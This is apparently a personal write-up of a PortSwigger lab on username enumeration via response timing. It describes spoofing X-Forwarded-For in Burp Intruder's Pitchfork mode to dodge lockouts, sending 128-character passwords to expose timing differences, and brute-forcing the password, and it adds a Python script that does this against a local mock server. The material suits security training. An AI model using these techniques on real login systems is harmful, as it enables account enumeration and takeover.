Username enumeration via response timing
Task
This lab is vulnerable to username enumeration using its response times. To solve the lab, enumerate a valid username, brute-force this user’s password, then access their account page.
Your credentials: wiener:peter
Candidate usernames
Candidate passwords
Attempt
Use Intruder against the login form to enumerate the correct username. But after the 2nd payload, I got a "too many incorrect login attempts" error. Add the X-Forwarded-For header and, using the Pitchfork attack type, spoof your IP address: pair the header with a payload set that gives every request a fresh, never-reused value, so each attempt appears to come from a different client and the per-IP lockout never triggers.
Since this website doesn't give you any overt error message indicating that only your password is incorrect, you have to read the timing instead. The server only gets as far as checking the password once the username has matched, so submit a very long password: requests for the valid username then take noticeably longer to process than requests for unknown ones, and the slowest response in the Intruder results points at the real account.
![[Pasted image 20250520225849.png]]
You can generate a pseudo-random string like this and copy it to the clipboard:

```bash
< /dev/urandom tr -dc 'a-zA-Z0-9' | head -c128 | xclip -selection clipboard
```
After identifying the correct username, brute-force the password the same way (the lockout applies here too, so keep rotating X-Forwarded-For) and log in to the website!
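To make the whole procedure concrete outside of Burp, here is an added example; it is my code, not part of the original write-up or PortSwigger's lab. The target is a constructed stand-in login server (an assumption, so the example runs offline) that imitates only the two behaviours the attack relies on: the password is checked only after the username has matched, and the lockout counts failures per IP taken from X-Forwarded-For. The `albert` account, the limit of 3 failures, the per-character delay and the `10.0.x.y` spoofed addresses are all assumptions of the stand-in. The client does what Pitchfork does in Intruder: one fresh header value per request, a 128-character password, and a comparison of response times.

```python
"""Timing-based username enumeration with X-Forwarded-For rotation.

Added example; the target is a constructed stand-in (assumption), not the
real lab. Point time_login()/enumerate_users() at a real login URL instead
of the URL from start_server() to use the client part for real.
"""
import secrets
import string
import threading
import time
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from http.server import BaseHTTPRequestHandler, HTTPServer

VALID_USER = "albert"  # constructed: the only account the stand-in knows
FAIL_LIMIT = 3         # constructed: lockout threshold of the stand-in


class FakeLoginHandler(BaseHTTPRequestHandler):
    failures = Counter()  # failed attempts per (claimed) client IP

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        # The flaw: the "client IP" comes from a header the client controls.
        ip = self.headers.get("X-Forwarded-For", self.client_address[0])
        if self.failures[ip] >= FAIL_LIMIT:
            return self._reply(429, "You have made too many incorrect login attempts.")
        username = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if username == VALID_USER:
            # Password verification only runs for a known user, and its cost
            # grows with password length (128 chars -> ~128 ms here).
            time.sleep(0.001 * len(password))
        self.failures[ip] += 1
        self._reply(401, "Invalid username or password.")

    def _reply(self, code, text):
        body = text.encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_server():
    """Serve the stand-in on a random loopback port; return its login URL."""
    server = HTTPServer(("127.0.0.1", 0), FakeLoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_address[1]}/login"


def long_password(n=128):
    """Same idea as the urandom | tr | head one-liner above."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(n))


def time_login(target, username, password, spoofed_ip=None):
    """POST one login attempt; return (status code, elapsed seconds)."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    headers = {"X-Forwarded-For": spoofed_ip} if spoofed_ip else {}
    req = urllib.request.Request(target, data=data, headers=headers)
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(req) as resp:
            status = resp.status
    except urllib.error.HTTPError as err:
        status = err.code  # a rejected login is still a timed, useful answer
    return status, time.perf_counter() - start


def lockout_without_spoofing(target):
    """Status of the request that follows FAIL_LIMIT failures from one real IP."""
    for _ in range(FAIL_LIMIT):
        time_login(target, "nobody", "x")
    return time_login(target, "nobody", "x")[0]


def enumerate_users(target, candidates, samples=3):
    """Map each candidate username to its fastest observed response time.

    Every request carries a never-reused X-Forwarded-For value (what Pitchfork
    gives you with the header as one payload set and the usernames as the
    other). The minimum of several samples filters out network jitter.
    """
    password = long_password()
    timings = {}
    for i, user in enumerate(candidates):
        spoofed = [f"10.0.{i}.{k + 1}" for k in range(samples)]  # constructed IPs
        timings[user] = min(time_login(target, user, password, ip)[1] for ip in spoofed)
    return timings


def pick_slowest(timings):
    """The username whose response took longest is the enumeration candidate."""
    return max(timings, key=timings.get)


if __name__ == "__main__":
    url = start_server()
    print("4th unspoofed attempt ->", lockout_without_spoofing(url))
    results = enumerate_users(url, ["admin", "albert", "wiener", "guest"])
    for user, secs in sorted(results.items(), key=lambda kv: -kv[1]):
        print(f"{user:8s} {secs * 1000:7.1f} ms")
    print("likely valid username:", pick_slowest(results))
```

Taking the minimum over a few samples per username rather than a single measurement is the one thing worth carrying back into Burp: one slow response means nothing by itself, a username that is slow on every attempt is the signal.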
Thoughts
Though I just blasted Intruder and performed a brute-force attack, this is not realistic, because in real environments you don't know what kind of vulnerability they have, and brute-forcing is often prohibited by the rules. And you know that a 128-letter password is too long for most websites.